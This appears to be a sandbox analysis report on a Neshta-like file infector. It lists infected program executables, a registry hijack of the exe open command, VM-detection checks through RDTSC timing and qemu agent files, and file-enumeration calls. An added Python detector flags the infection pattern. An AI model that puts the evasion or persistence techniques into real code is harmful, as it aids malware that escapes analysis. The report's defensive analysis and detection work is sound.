                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara match | File source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Creates an undocumented autostart registry key
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Tries to detect Any.runShow sources
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
                  Tries to detect virtualization through RDTSC time measurementsShow sources
                  Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exeRDTSC instruction interceptor: First address: 000000000040B86B second address: 000000000040B86B instructions: 0x00000000 rdtsc 0x00000002 cmp di, 00F2h 0x00000007 xor eax, edx 0x00000009 fscale 0x0000000b jmp 00007F8CE03930AFh 0x0000000d cmp bx, 001Bh 0x00000011 dec edi 0x00000012 cmp bh, 0000003Dh 0x00000015 cmp edi, 00000000h 0x00000018 jne 00007F8CE0392FDBh 0x0000001e cmp bl, FFFFFFDCh 0x00000021 mov ebx, 0E247385h 0x00000026 cmp bx, 0084h 0x0000002b xor ebx, 42241BB4h 0x00000031 cmp ax, 0000009Ah 0x00000035 faddp st(3), st(0) 0x00000037 jmp 00007F8CE03930B0h 0x00000039 add ebx, C9881A27h 0x0000003f cmp dx, 009Ch 0x00000044 sub ebx, 15488258h 0x0000004a cmp dl, 00000042h 0x0000004d cmp ch, 0000006Bh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Windows\svchost.com
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
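What distinguishes the list above from an installer is not the number of executables written but their spread: one process from the user's Desktop overwrote executables belonging to Adobe, Java, Office, Google, AutoIt and the ProgramData package cache, and also created C:\Windows\svchost.com. The Python detector below is an added example, not part of the report or of any product; it runs over constructed FileCreate events (Sysmon Event ID 11 reduced to a "time|pid|image|target" line). The Z68mMCAxFZ.exe targets are taken from the dropped-file list above and PID 6284 from this report, while the timestamps, the msiexec lines and the "ExampleVendor" product directory are invented controls. It raises an alert when one process writes PE files into several distinct first-level directories under the program roots, and separately when the two Neshta paths seen in this report (C:\Windows\svchost.com and the \Temp\3582-490\ staging directory) appear.

```python
from collections import defaultdict

# Constructed FileCreate events: "time|pid|image|target". Infector lines use paths from
# this report; msiexec and Chrome-update lines are invented benign controls.
EVENTS = r"""
10:00:01|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe
10:00:01|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
10:00:01|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
10:00:02|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
10:00:02|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
10:00:02|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Program Files (x86)\AutoIt3\Au3Check.exe
10:00:03|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
10:00:03|6284|C:\Users\user\Desktop\Z68mMCAxFZ.exe|C:\Windows\svchost.com
10:05:10|1412|C:\Windows\System32\msiexec.exe|C:\Program Files (x86)\ExampleVendor\Tool\tool.exe
10:05:10|1412|C:\Windows\System32\msiexec.exe|C:\Program Files (x86)\ExampleVendor\Tool\helper.exe
10:05:11|1412|C:\Windows\System32\msiexec.exe|C:\Program Files (x86)\ExampleVendor\Tool\uninstall.exe
10:05:11|1412|C:\Windows\System32\msiexec.exe|C:\Program Files (x86)\ExampleVendor\Tool\tool.dll
10:05:11|1412|C:\Windows\System32\msiexec.exe|C:\Program Files (x86)\ExampleVendor\Tool\plugin.dll
10:07:00|2200|C:\Program Files (x86)\Google\Update\GoogleUpdate.exe|C:\Program Files (x86)\Google\Chrome\Application\new_chrome.exe
"""

PROGRAM_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\programdata\\")
PE_EXT = (".exe", ".dll", ".sys")
# Paths observed in this report for Neshta: the renamed helper and the staging directory.
NESHTA_SVCHOST_COM = "c:\\windows\\svchost.com"
NESHTA_STAGING_DIR = "\\temp\\3582-490\\"


def vendor_root(path):
    """First-level directory under a program root (e.g. 'c:\\program files (x86)\\adobe'),
    lower-cased, or None when the path is outside the program roots."""
    low = path.lower()
    for root in PROGRAM_ROOTS:
        if low.startswith(root):
            return root + path[len(root):].split("\\", 1)[0].lower()
    return None


def detect(events, min_vendor_dirs=3, min_targets=5):
    """Return one alert per process that behaves like a file infector.

    Vendor spread: PE files written into >= min_vendor_dirs distinct product
    directories (an installer stays inside its own). Path IOCs: the two Neshta
    paths above are reported on their own, independent of the thresholds."""
    per_proc = defaultdict(lambda: {"image": None, "targets": set(), "vendors": set(), "iocs": []})
    for line in events.strip().splitlines():
        _ts, pid, image, target = line.split("|", 3)
        rec = per_proc[pid]
        rec["image"] = image
        low = target.lower()
        if low == NESHTA_SVCHOST_COM or NESHTA_STAGING_DIR in low:
            rec["iocs"].append(target)
        if low.endswith(PE_EXT):
            vendor = vendor_root(target)
            if vendor:
                rec["targets"].add(target)
                rec["vendors"].add(vendor)

    alerts = []
    for pid, rec in per_proc.items():
        reasons = []
        if len(rec["vendors"]) >= min_vendor_dirs and len(rec["targets"]) >= min_targets:
            reasons.append(f"wrote {len(rec['targets'])} PE files across "
                           f"{len(rec['vendors'])} product directories")
        if rec["iocs"]:
            reasons.append("Neshta path indicator: " + ", ".join(rec["iocs"]))
        if reasons:
            alerts.append({"pid": pid, "image": rec["image"],
                           "pe_targets": len(rec["targets"]),
                           "vendor_dirs": len(rec["vendors"]), "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["pid"], alert["image"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

With the default thresholds only PID 6284 alerts (six PE targets in six product directories, plus both path indicators); msiexec, which writes five PE files into a single product directory, stays silent. Lowering min_vendor_dirs to 1 makes the installer alert as well, which is the false positive the vendor-spread condition exists to avoid.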
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00405080 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00405634 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00404F6C FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040F0C4 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040F0CC FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040F13F FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_004056A7 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040EA04 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040EB16 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_0040EB18 FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | Code function: 0_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA
Source: C:\Users\user\AppData\Local\Temp\3582-490\Z68mMCAxFZ.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe | File opened: C:\DOCUME~1\ALLUSE~1\APPLIC~1\APPLIC~1\APPLIC~1\Adobe\Setup\{AC76B~1\setup.exe
